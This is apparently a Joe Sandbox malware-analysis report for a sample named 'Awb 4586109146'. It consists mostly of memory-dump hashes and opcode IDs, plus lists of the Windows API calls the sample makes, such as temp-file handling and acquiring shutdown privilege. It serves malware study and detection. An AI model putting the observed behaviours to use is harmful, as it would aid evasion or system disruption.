                                                                    • Instruction Fuzzy Hash: 5B216876B04641EBDB039B78DC4835E7FB4FB4A711B240669D825CF240EB318846C7A0
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880629981.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_150000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8bd9777bbabf4aea19f208b2c41c23ae084d5f2f2c9949cc249e544c10be5c07
                                                                    • Instruction ID: abdf300e5b93817afe991f7ae0077a4b70132ced1e3709f6b44873bb0796302e
                                                                    • Opcode Fuzzy Hash: 8bd9777bbabf4aea19f208b2c41c23ae084d5f2f2c9949cc249e544c10be5c07
                                                                    • Instruction Fuzzy Hash: 0F213734A10214CFEB54DF78C569AAE7BF1BF89745F100569E802EB3A0DB759D05CB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880629981.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_150000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4d2cd43e3f69581d28d483136e04bcabf5bcd17be372212c1ae6ac9efae18305
                                                                    • Instruction ID: 355634d022391bf45df5a80ec814dbfb6e487acc0a2b8ad70d3275f198e4a86d
                                                                    • Opcode Fuzzy Hash: 4d2cd43e3f69581d28d483136e04bcabf5bcd17be372212c1ae6ac9efae18305
                                                                    • Instruction Fuzzy Hash: CC217F31E1020ADBCB08CFA4C85059EB7B2AF89300F60861AFC25BB390DB71AC49CB51
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880629981.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_150000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c9b3a09f3ce28b2fef52d79137974e963e92e19db878bc34b74e8619a79c33aa
                                                                    • Instruction ID: 769f9d149fdd637ecef2cea6a8808e9b4e411609039b167e52f553be6580886d
                                                                    • Opcode Fuzzy Hash: c9b3a09f3ce28b2fef52d79137974e963e92e19db878bc34b74e8619a79c33aa
                                                                    • Instruction Fuzzy Hash: E2212A30B00205DFEB65EB64C5657AE77F6AB49346F200468D816EF390DB368D45CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880629981.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_150000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d0e9e27217be6dd5727aeb543d3ea254e4509ac1ff3b42d42fc8d24f35357116
                                                                    • Instruction ID: 994d43a4a1cf318a3d46ce61f4b28662014b106e83e74f95905f735806a9bcaa
                                                                    • Opcode Fuzzy Hash: d0e9e27217be6dd5727aeb543d3ea254e4509ac1ff3b42d42fc8d24f35357116
                                                                    • Instruction Fuzzy Hash: 1C215130600201EBFF725B64D9553693A51FB5B326F10092AE81ADF690DB69CCC9CB46
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880629981.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_150000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f1846a450f432e9d9a7578f8e70c6fd79b4d997518977b7268c9c80aebb229de
                                                                    • Instruction ID: 3f7a43b8323ffe4c533f622dee69e5e5197ff2fdd5917d8ff726b988e0af2a32
                                                                    • Opcode Fuzzy Hash: f1846a450f432e9d9a7578f8e70c6fd79b4d997518977b7268c9c80aebb229de
                                                                    • Instruction Fuzzy Hash: 7E21A834204200EFFF11DB28E985B5E3B65F78E716F104A25D81ADF664EB39DC498B92
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880629981.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_150000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 06a83ddc73756befc3526a9eeabf1d946756d7a617ae1b7ee6c8d6965d489fc3
                                                                    • Instruction ID: 7ae8fd78a89099ba398a47e33f481e55908e9d58994e41d850c9bc4bd2f56c80
                                                                    • Opcode Fuzzy Hash: 06a83ddc73756befc3526a9eeabf1d946756d7a617ae1b7ee6c8d6965d489fc3
                                                                    • Instruction Fuzzy Hash: B7212834710204CFEB54EB78C969BAE77F2AF89745F100569E806EB3A0DB359C05CB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3909283476.0000000039B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39B80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_39b80000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fbe136fce0e2c47d89fca805fda364841c4a54163e1fee511c930ceeceb55074
                                                                    • Instruction ID: 9d90853637f4db51ae597b775dd0ef3dcca463e181f66e9173fa1879e64a6168
                                                                    • Opcode Fuzzy Hash: fbe136fce0e2c47d89fca805fda364841c4a54163e1fee511c930ceeceb55074
                                                                    • Instruction Fuzzy Hash: 2721B434B041A89FEB44EA68E95568EB7B7FBC9350F248535D805EB780DB31EC418B80
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880629981.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_150000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 368f574e0f9565817dd9da812fae55cf7994a8ce6f9d525e749aa07b42c16721
                                                                    • Instruction ID: e67aa6831557e0c887e9678aba524f4f103353c28aadd33964209aec3d0c0b80
                                                                    • Opcode Fuzzy Hash: 368f574e0f9565817dd9da812fae55cf7994a8ce6f9d525e749aa07b42c16721
                                                                    • Instruction Fuzzy Hash: 0611C130F00208CBEF169BBAC945B293255FB8D726F20493ED926CF245DB24CC898BC1
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3909283476.0000000039B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39B80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_39b80000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 857caf2cddab0a563da62fa7e745762523c5a08a44d5b13e8a8516af4f7c3cc4
                                                                    • Instruction ID: d2a107f5655943b89782541b531d207ae820a6a96a5df4bb8a8dbab439aec953
                                                                    • Opcode Fuzzy Hash: 857caf2cddab0a563da62fa7e745762523c5a08a44d5b13e8a8516af4f7c3cc4
                                                                    • Instruction Fuzzy Hash: 3411C035B042698FEB54DA68DC146AE77EAEBCC750F044239D80AF7340EE65DC028BE0
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880629981.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_150000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d3fa07a8c0356350a92ddffd679a84c383b2f595713cb2651cb6e4efd2f0fee8
                                                                    • Instruction ID: 369bd35cb8c4b65b748278a0454909b4852caf77fe7bcd494f51bf4689ed47e3
                                                                    • Opcode Fuzzy Hash: d3fa07a8c0356350a92ddffd679a84c383b2f595713cb2651cb6e4efd2f0fee8
                                                                    • Instruction Fuzzy Hash: E4119E31A01211DFCF22EFB894502ADBBE1AF58312B14147AE855EB242E739C846C791
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3909283476.0000000039B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39B80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_39b80000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7d467f1b79fc9b3eaf82d519613bb3e6dddb239d0298e2f7bd74e7b65130f58d
                                                                    • Instruction ID: 202b1669de7991c7b1324c35e6659cd32250fb8b37f42087de1443d9a84f4f8c
                                                                    • Opcode Fuzzy Hash: 7d467f1b79fc9b3eaf82d519613bb3e6dddb239d0298e2f7bd74e7b65130f58d
                                                                    • Instruction Fuzzy Hash: 2F01DE35B081A01FEB11CA2C981679FB7D7CBCA304F25843EE10EC7792E995EC028781
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880629981.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_150000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cc935c305cedcfaeba2daef722040de1413d10ed51ba23b263c63b160190b3cb
                                                                    • Instruction ID: 99488ed73c8eadfcbbd156e93ab8dce8239152693feabce9260b0dcd937f2cd1
                                                                    • Opcode Fuzzy Hash: cc935c305cedcfaeba2daef722040de1413d10ed51ba23b263c63b160190b3cb
                                                                    • Instruction Fuzzy Hash: 9B11E5317087909FC716AB7894206AE7FB2EFCA305B1045AFD056CB792DB359905CB92
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3909283476.0000000039B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39B80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_39b80000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 46e39901b01f02e7f9e74f5f91440b349c7c2192a127518ac54909d969328078
                                                                    • Instruction ID: fd1c8e4da50d84f04b52884ca5da92dc56d8de87a007309060f0188573f5467a
                                                                    • Opcode Fuzzy Hash: 46e39901b01f02e7f9e74f5f91440b349c7c2192a127518ac54909d969328078
                                                                    • Instruction Fuzzy Hash: 15012F317041A04FEB65AA6CC451B6F73E2EBCE711F10883AE00ED7340EA21EC038782
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880629981.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_150000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9b7d5d06d31e90589b97e24426af35e59fe6aa5df5903965be75afbeab6e1c42
                                                                    • Instruction ID: dff59e97af6e6d4bc0b784904be576c36db058c62e0aa5288a188bbe8d97c6ee
                                                                    • Opcode Fuzzy Hash: 9b7d5d06d31e90589b97e24426af35e59fe6aa5df5903965be75afbeab6e1c42
                                                                    • Instruction Fuzzy Hash: C5018031E01215DFCF22EFB994512AD7BF5EB48352B24047AEC15EB241E739C8468B91
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3909283476.0000000039B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39B80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_39b80000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: efac779c2ce50206f6442054dbb3f3c8ea45c3de3668353779407bdd4422618c
                                                                    • Instruction ID: be2304668eb817c948f8236d22470a3c196b28636236e6360609e6649c394f05
                                                                    • Opcode Fuzzy Hash: efac779c2ce50206f6442054dbb3f3c8ea45c3de3668353779407bdd4422618c
                                                                    • Instruction Fuzzy Hash: F301D439B141A94BEB949A6898116EF77AADBC9350F00423AD41AE7380DE2488028BE1
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3909283476.0000000039B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39B80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_39b80000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 17b5205e93f84680f8c66b28a900c9245ab4ce8cce1dc5b1cd10e47427e9ad52
                                                                    • Instruction ID: 987a3613f3abe63c2fed03db06dfa8d18fc8c1c90a0c53f5079e8cdf08945240
                                                                    • Opcode Fuzzy Hash: 17b5205e93f84680f8c66b28a900c9245ab4ce8cce1dc5b1cd10e47427e9ad52
                                                                    • Instruction Fuzzy Hash: 1411AFB5D01259AFCB00DF9AD884ADEFBB4FB48724F50812AE918A7240C375A954CFA5
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3909283476.0000000039B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39B80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_39b80000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a0a450d4a99032ea9c03df60e91d793733eb3ca8ada794b22fc937855a461e67
                                                                    • Instruction ID: d726bee7e2a23bff06ab1974b4c1bbba8ca0817624e4d737b70dd0815fb2358c
                                                                    • Opcode Fuzzy Hash: a0a450d4a99032ea9c03df60e91d793733eb3ca8ada794b22fc937855a461e67
                                                                    • Instruction Fuzzy Hash: 8521C0B5D01299AFDB00DF9AD984ACEFBB4BB48310F10856AE918A7640C3746954CFA5
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3909283476.0000000039B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39B80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_39b80000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b9a1ee991ae827a6072e37600493c5efae53c4bf64605b766edb055d6e30888a
                                                                    • Instruction ID: 883086ff2ecdf53814abc9d04fa06cb4250bbc55b933c42cfef9d8a71925b8bb
                                                                    • Opcode Fuzzy Hash: b9a1ee991ae827a6072e37600493c5efae53c4bf64605b766edb055d6e30888a
                                                                    • Instruction Fuzzy Hash: DF018F347081A08FFB01DE7C996675B77E2EB8A740B14856DE10FD7391DA25EC038791
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3909283476.0000000039B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39B80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_39b80000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cd9fae0c568a50b971d399c5bcb326dcf497ff2a09087bcc4d7572153049c0c0
                                                                    • Instruction ID: cd4d1161311f803b51db50be973cac8ae9bb50e06b79f5336c7736a8b25383b0
                                                                    • Opcode Fuzzy Hash: cd9fae0c568a50b971d399c5bcb326dcf497ff2a09087bcc4d7572153049c0c0
                                                                    • Instruction Fuzzy Hash: 9B01DC387041601BEB149A6DA81275FB2CBDBCA714F20843AE10EC7385EA66EC0243C1
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3909283476.0000000039B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39B80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_39b80000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c063f989672850e13a39a700847281647f68eb199dc018df696f383c51f71c92
                                                                    • Instruction ID: 65c6cd1e6298ac69225b909311d64e6fe75a77c30d06b4266bfd13077393ff34
                                                                    • Opcode Fuzzy Hash: c063f989672850e13a39a700847281647f68eb199dc018df696f383c51f71c92
                                                                    • Instruction Fuzzy Hash: B6018C357045A04FEB94A66DD852B2F73D6DBCEB61F108839E50ED7340EA25EC034382
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3909283476.0000000039B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39B80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_39b80000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e18fc151417c22576ae244832353a5e61561ba841bb183883bafc6e776c275d5
                                                                    • Instruction ID: 8cdcb700cdc087b74fbdfa82089e5b0259206461e2e4894b20e697edbee4da57
                                                                    • Opcode Fuzzy Hash: e18fc151417c22576ae244832353a5e61561ba841bb183883bafc6e776c275d5
                                                                    • Instruction Fuzzy Hash: 650169347041A08FFB509A6CD866B4B73D6EB8AB50F10853CE50AE7380EA25EC038781
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3909283476.0000000039B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39B80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_39b80000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6edd660877d8b64fbe856fe774625d68c5a6a28c4f9d2d96f5592d706292037c
                                                                    • Instruction ID: a5def4e913d31e691b2e0cc40c8b40b23f16707f6107df0e3ae9b7238ac2276e
                                                                    • Opcode Fuzzy Hash: 6edd660877d8b64fbe856fe774625d68c5a6a28c4f9d2d96f5592d706292037c
                                                                    • Instruction Fuzzy Hash: A8F0223A70C3A1DFFF158E44EA822AD73A0EB88390F14413AE814DB251CB31E903C791
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3909283476.0000000039B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39B80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_39b80000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 703e4abdf53d6b897a8ee01025a5399c6a21d056f43a47242ac05a4c90038c82
                                                                    • Instruction ID: ece9ead8b73c0e371002ff96690582fdead734e67dbdfe035fd6fb718927a5db
                                                                    • Opcode Fuzzy Hash: 703e4abdf53d6b897a8ee01025a5399c6a21d056f43a47242ac05a4c90038c82
                                                                    • Instruction Fuzzy Hash: 59F0A736A552A8A7E7149575DC0159AB37AF789350F104525ED00F7244DB31A805C7D1
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3909283476.0000000039B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39B80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_39b80000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ce65f96694e49f7e26d0a08845f79dde21296340525988e4d766d31c59a3b649
                                                                    • Instruction ID: 54605760dc0bf0c5a7bf562df931a5604b0ee3018f4a7eacd94f7cf0f1f92044
                                                                    • Opcode Fuzzy Hash: ce65f96694e49f7e26d0a08845f79dde21296340525988e4d766d31c59a3b649
                                                                    • Instruction Fuzzy Hash: DAF0927190D2CCEFEB01CE74891D68D7BB8EB0A244F2085AAD408DB242D676CA02CB10
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32 ref: 004033B2
                                                                    • GetVersion.KERNEL32 ref: 004033B8
                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033EB
                                                                    • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403428
                                                                    • OleInitialize.OLE32(00000000), ref: 0040342F
                                                                    • SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 0040344B
                                                                    • GetCommandLineW.KERNEL32(00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 00403460
                                                                    • CharNextW.USER32(00000000,0043F000,00000020,0043F000,00000000,?,00000006,00000008,0000000A), ref: 00403498
                                                                      • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                                      • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                                    • GetTempPathW.KERNEL32(00000400,00441800,?,00000006,00000008,0000000A), ref: 004035D2
                                                                    • GetWindowsDirectoryW.KERNEL32(00441800,000003FB,?,00000006,00000008,0000000A), ref: 004035E3
                                                                    • lstrcatW.KERNEL32(00441800,\Temp,?,00000006,00000008,0000000A), ref: 004035EF
                                                                    • GetTempPathW.KERNEL32(000003FC,00441800,00441800,\Temp,?,00000006,00000008,0000000A), ref: 00403603
                                                                    • lstrcatW.KERNEL32(00441800,Low,?,00000006,00000008,0000000A), ref: 0040360B
                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,00441800,00441800,Low,?,00000006,00000008,0000000A), ref: 0040361C
                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,00441800,?,00000006,00000008,0000000A), ref: 00403624
                                                                    • DeleteFileW.KERNEL32(00441000,?,00000006,00000008,0000000A), ref: 00403638
                                                                      • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                                                    • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403703
                                                                    • ExitProcess.KERNEL32 ref: 00403724
                                                                    • lstrcatW.KERNEL32(00441800,~nsu,0043F000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403737
                                                                    • lstrcatW.KERNEL32(00441800,0040A26C,00441800,~nsu,0043F000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403746
                                                                    • lstrcatW.KERNEL32(00441800,.tmp,00441800,~nsu,0043F000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403751
                                                                    • lstrcmpiW.KERNEL32(00441800,00440800,00441800,.tmp,00441800,~nsu,0043F000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040375D
                                                                    • SetCurrentDirectoryW.KERNEL32(00441800,00441800,?,00000006,00000008,0000000A), ref: 00403779
                                                                    • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,00000008,?,00000006,00000008,0000000A), ref: 004037D3
                                                                    • CopyFileW.KERNEL32(00442800,0042AA08,?,?,00000006,00000008,0000000A), ref: 004037E7
                                                                    • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,00000008,0000000A), ref: 00403814
                                                                    • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403843
                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 0040384A
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040385F
                                                                    • AdjustTokenPrivileges.ADVAPI32 ref: 00403882
                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 004038A7
                                                                    • ExitProcess.KERNEL32 ref: 004038CA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                    • String ID: .tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                    • API String ID: 3441113951-3195845224
                                                                    • Opcode ID: 22b8795af144aae1d525309f94cca5ba9a4a3f263f85987c0d75d6683015679d
                                                                    • Instruction ID: 34b402965a056e7880f406cddf034ee68ffb155d70387f36a3cc73b0da0a8952
                                                                    • Opcode Fuzzy Hash: 22b8795af144aae1d525309f94cca5ba9a4a3f263f85987c0d75d6683015679d
                                                                    • Instruction Fuzzy Hash: FBD11571500310ABE720BF659D45B2B3AACEB4074AF10447FF881B62E1DBBD9E45876E
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404CB6
                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404CC1
                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D0B
                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404D1E
                                                                    • SetWindowLongW.USER32(?,000000FC,00405296), ref: 00404D37
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D4B
                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D5D
                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404D73
                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D7F
                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D91
                                                                    • DeleteObject.GDI32(00000000), ref: 00404D94
                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404DBF
                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DCB
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E61
                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E8C
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EA0
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404ECF
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EDD
                                                                    • ShowWindow.USER32(?,00000005), ref: 00404EEE
                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FEB
                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405050
                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405065
                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405089
                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004050A9
                                                                    • ImageList_Destroy.COMCTL32(?), ref: 004050BE
                                                                    • GlobalFree.KERNEL32(?), ref: 004050CE
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405147
                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 004051F0
                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051FF
                                                                    • InvalidateRect.USER32(?,00000000,?), ref: 0040521F
                                                                    • ShowWindow.USER32(?,00000000), ref: 0040526D
                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00405278
                                                                    • ShowWindow.USER32(00000000), ref: 0040527F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                    • String ID: $M$N
                                                                    • API String ID: 1638840714-813528018
                                                                    • Opcode ID: 38e67d642b103c863e09d225da822fb6d69acbe0d816e4b8de2aebeebed4de2d
                                                                    • Instruction ID: f888d98cc81d7f01a919363da6f821789f230268a52e2f70c0503caf05bd5b25
